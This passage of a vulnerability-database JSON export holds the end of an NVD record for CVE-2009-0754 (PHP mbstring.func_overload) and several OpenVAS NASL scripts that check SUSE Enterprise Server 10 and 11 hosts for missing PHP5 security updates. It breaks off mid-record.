sites hosted on the same web server by modifying the mbstring.func_overload setting within .htaccess, which causes this setting to be applied to other virtual hosts on the same server.", "edition": 5, "cvss3": {}, "published": "2009-03-03T16:30:00", "title": "CVE-2009-0754", "type": "cve", "cwe": ["CWE-134"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-0754"], "modified": "2018-10-03T21:58:00", "cpe": ["cpe:/a:php:php:5.1.6", "cpe:/a:php:php:4.4.4"], "id": "CVE-2009-0754", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0754", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:php:php:5.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.4:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2018-04-06T11:39:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0754", "CVE-2008-5498"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-mod_php5\n php5\n php5-bcmath\n php5-bz2\n php5-calendar\n php5-ctype\n php5-curl\n php5-dba\n php5-dbase\n php5-devel\n php5-dom\n php5-exif\n php5-fastcgi\n php5-ftp\n php5-gd\n php5-gettext\n php5-gmp\n php5-iconv\n php5-imap\n php5-json\n php5-ldap\n php5-mbstring\n php5-mcrypt\n php5-mhash\n php5-mysql\n php5-ncurses\n php5-odbc\n php5-openssl\n php5-pcntl\n php5-pdo\n php5-pear\n php5-pgsql\n php5-posix\n php5-pspell\n php5-shmop\n php5-snmp\n php5-soap\n php5-sockets\n php5-sqlite\n php5-suhosin\n php5-sysvmsg\n php5-sysvsem\n php5-sysvshm\n php5-tokenizer\n php5-wddx\n php5-xmlreader\n php5-xmlrpc\n php5-xsl\n php5-zlib\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-13T00:00:00", "id": "OPENVAS:136141256231065786", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065786", "type": "openvas", "title": "SLES10: Security update for PHP5", "sourceData": "#\n#VID slesp2-apache2-mod_php5-6069\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for PHP5\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-mod_php5\n php5\n php5-bcmath\n php5-bz2\n php5-calendar\n php5-ctype\n php5-curl\n php5-dba\n php5-dbase\n php5-devel\n php5-dom\n php5-exif\n php5-fastcgi\n php5-ftp\n php5-gd\n php5-gettext\n php5-gmp\n php5-iconv\n php5-imap\n php5-json\n php5-ldap\n php5-mbstring\n php5-mcrypt\n php5-mhash\n php5-mysql\n php5-ncurses\n php5-odbc\n php5-openssl\n php5-pcntl\n php5-pdo\n php5-pear\n php5-pgsql\n php5-posix\n php5-pspell\n php5-shmop\n php5-snmp\n php5-soap\n php5-sockets\n php5-sqlite\n php5-suhosin\n php5-sysvmsg\n php5-sysvsem\n php5-sysvshm\n php5-tokenizer\n php5-wddx\n php5-xmlreader\n php5-xmlrpc\n php5-xsl\n php5-zlib\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65786\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2008-5498\", \"CVE-2009-0754\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"SLES10: Security update for PHP5\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache2-mod_php5\", rpm:\"apache2-mod_php5~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5\", rpm:\"php5~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-bcmath\", rpm:\"php5-bcmath~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-bz2\", rpm:\"php5-bz2~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-calendar\", rpm:\"php5-calendar~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ctype\", rpm:\"php5-ctype~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-curl\", rpm:\"php5-curl~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dba\", rpm:\"php5-dba~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dbase\", rpm:\"php5-dbase~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-devel\", rpm:\"php5-devel~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dom\", rpm:\"php5-dom~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-exif\", rpm:\"php5-exif~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-fastcgi\", rpm:\"php5-fastcgi~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ftp\", rpm:\"php5-ftp~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gd\", rpm:\"php5-gd~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gettext\", rpm:\"php5-gettext~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gmp\", rpm:\"php5-gmp~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-iconv\", rpm:\"php5-iconv~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-imap\", rpm:\"php5-imap~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-json\", rpm:\"php5-json~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ldap\", rpm:\"php5-ldap~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mbstring\", rpm:\"php5-mbstring~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mcrypt\", rpm:\"php5-mcrypt~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mhash\", rpm:\"php5-mhash~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mysql\", rpm:\"php5-mysql~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ncurses\", rpm:\"php5-ncurses~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-odbc\", rpm:\"php5-odbc~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-openssl\", rpm:\"php5-openssl~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pcntl\", rpm:\"php5-pcntl~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pdo\", rpm:\"php5-pdo~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pear\", rpm:\"php5-pear~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pgsql\", rpm:\"php5-pgsql~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-posix\", rpm:\"php5-posix~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pspell\", rpm:\"php5-pspell~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-shmop\", rpm:\"php5-shmop~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-snmp\", rpm:\"php5-snmp~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-soap\", rpm:\"php5-soap~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sockets\", rpm:\"php5-sockets~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sqlite\", rpm:\"php5-sqlite~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-suhosin\", rpm:\"php5-suhosin~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvmsg\", rpm:\"php5-sysvmsg~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvsem\", rpm:\"php5-sysvsem~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvshm\", rpm:\"php5-sysvshm~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-tokenizer\", rpm:\"php5-tokenizer~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-wddx\", rpm:\"php5-wddx~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlreader\", rpm:\"php5-xmlreader~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlrpc\", rpm:\"php5-xmlrpc~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xsl\", rpm:\"php5-xsl~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-zlib\", rpm:\"php5-zlib~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-04-06T11:38:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0754", "CVE-2008-5498"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-mod_php5\n php5\n php5-bcmath\n php5-bz2\n php5-calendar\n php5-ctype\n php5-curl\n php5-dba\n php5-dbase\n php5-dom\n php5-exif\n php5-fastcgi\n php5-ftp\n php5-gd\n php5-gettext\n php5-gmp\n php5-hash\n php5-iconv\n php5-json\n php5-ldap\n php5-mbstring\n php5-mcrypt\n php5-mysql\n php5-odbc\n php5-openssl\n php5-pcntl\n php5-pdo\n php5-pear\n php5-pgsql\n php5-pspell\n php5-shmop\n php5-snmp\n php5-soap\n php5-suhosin\n php5-sysvmsg\n php5-sysvsem\n php5-sysvshm\n php5-tokenizer\n php5-wddx\n php5-xmlreader\n php5-xmlrpc\n php5-xmlwriter\n php5-xsl\n php5-zip\n php5-zlib\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-11T00:00:00", "id": "OPENVAS:136141256231065637", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065637", "type": "openvas", "title": "SLES11: Security update for PHP5", "sourceData": "#\n#VID d121477dd9cc7bfeaa1d7d8a6d824fa0\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for PHP5\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-mod_php5\n php5\n php5-bcmath\n php5-bz2\n php5-calendar\n php5-ctype\n php5-curl\n php5-dba\n php5-dbase\n php5-dom\n php5-exif\n php5-fastcgi\n php5-ftp\n php5-gd\n php5-gettext\n php5-gmp\n php5-hash\n php5-iconv\n php5-json\n php5-ldap\n php5-mbstring\n php5-mcrypt\n php5-mysql\n php5-odbc\n php5-openssl\n php5-pcntl\n php5-pdo\n php5-pear\n php5-pgsql\n php5-pspell\n php5-shmop\n php5-snmp\n php5-soap\n php5-suhosin\n php5-sysvmsg\n php5-sysvsem\n php5-sysvshm\n php5-tokenizer\n php5-wddx\n php5-xmlreader\n php5-xmlrpc\n php5-xmlwriter\n php5-xsl\n php5-zip\n php5-zlib\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://bugzilla.novell.com/show_bug.cgi?id=480948\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.novell.com/show_bug.cgi?id=471419\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.65637\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-11 22:58:51 +0200 (Sun, 11 Oct 2009)\");\n script_cve_id(\"CVE-2008-5498\", \"CVE-2009-0754\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"SLES11: Security update for PHP5\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache2-mod_php5\", rpm:\"apache2-mod_php5~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5\", rpm:\"php5~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-bcmath\", rpm:\"php5-bcmath~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-bz2\", rpm:\"php5-bz2~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-calendar\", rpm:\"php5-calendar~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ctype\", rpm:\"php5-ctype~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-curl\", rpm:\"php5-curl~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dba\", rpm:\"php5-dba~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dbase\", rpm:\"php5-dbase~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dom\", rpm:\"php5-dom~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-exif\", rpm:\"php5-exif~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-fastcgi\", rpm:\"php5-fastcgi~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ftp\", rpm:\"php5-ftp~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gd\", rpm:\"php5-gd~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gettext\", rpm:\"php5-gettext~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gmp\", rpm:\"php5-gmp~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-hash\", rpm:\"php5-hash~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-iconv\", rpm:\"php5-iconv~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-json\", rpm:\"php5-json~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ldap\", rpm:\"php5-ldap~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mbstring\", rpm:\"php5-mbstring~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mcrypt\", rpm:\"php5-mcrypt~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mysql\", rpm:\"php5-mysql~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-odbc\", rpm:\"php5-odbc~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-openssl\", rpm:\"php5-openssl~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pcntl\", rpm:\"php5-pcntl~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pdo\", rpm:\"php5-pdo~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pear\", rpm:\"php5-pear~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pgsql\", rpm:\"php5-pgsql~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pspell\", rpm:\"php5-pspell~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-shmop\", rpm:\"php5-shmop~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-snmp\", rpm:\"php5-snmp~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-soap\", rpm:\"php5-soap~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-suhosin\", rpm:\"php5-suhosin~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvmsg\", rpm:\"php5-sysvmsg~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvsem\", rpm:\"php5-sysvsem~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvshm\", rpm:\"php5-sysvshm~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-tokenizer\", rpm:\"php5-tokenizer~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-wddx\", rpm:\"php5-wddx~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlreader\", rpm:\"php5-xmlreader~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlrpc\", rpm:\"php5-xmlrpc~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlwriter\", rpm:\"php5-xmlwriter~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xsl\", rpm:\"php5-xsl~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-zip\", rpm:\"php5-zip~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-zlib\", rpm:\"php5-zlib~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-26T08:55:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0754", "CVE-2008-5498"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-mod_php5\n php5\n php5-bcmath\n php5-bz2\n php5-calendar\n php5-ctype\n php5-curl\n php5-dba\n php5-dbase\n php5-dom\n php5-exif\n php5-fastcgi\n php5-ftp\n php5-gd\n php5-gettext\n php5-gmp\n php5-hash\n php5-iconv\n php5-json\n php5-ldap\n php5-mbstring\n php5-mcrypt\n php5-mysql\n php5-odbc\n php5-openssl\n php5-pcntl\n php5-pdo\n php5-pear\n php5-pgsql\n php5-pspell\n php5-shmop\n php5-snmp\n php5-soap\n php5-suhosin\n php5-sysvmsg\n php5-sysvsem\n php5-sysvshm\n php5-tokenizer\n php5-wddx\n php5-xmlreader\n php5-xmlrpc\n php5-xmlwriter\n php5-xsl\n php5-zip\n php5-zlib\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-11T00:00:00", "id": "OPENVAS:65637", "href": "http://plugins.openvas.org/nasl.php?oid=65637", "type": "openvas", "title": "SLES11: Security update for PHP5", "sourceData": "#\n#VID d121477dd9cc7bfeaa1d7d8a6d824fa0\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for PHP5\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-mod_php5\n php5\n php5-bcmath\n php5-bz2\n php5-calendar\n php5-ctype\n php5-curl\n php5-dba\n php5-dbase\n php5-dom\n php5-exif\n php5-fastcgi\n php5-ftp\n php5-gd\n php5-gettext\n php5-gmp\n php5-hash\n php5-iconv\n php5-json\n php5-ldap\n php5-mbstring\n php5-mcrypt\n php5-mysql\n php5-odbc\n php5-openssl\n php5-pcntl\n php5-pdo\n php5-pear\n php5-pgsql\n php5-pspell\n php5-shmop\n php5-snmp\n php5-soap\n php5-suhosin\n php5-sysvmsg\n php5-sysvsem\n php5-sysvshm\n php5-tokenizer\n php5-wddx\n php5-xmlreader\n php5-xmlrpc\n php5-xmlwriter\n php5-xsl\n php5-zip\n php5-zlib\n\n\nMore details may also 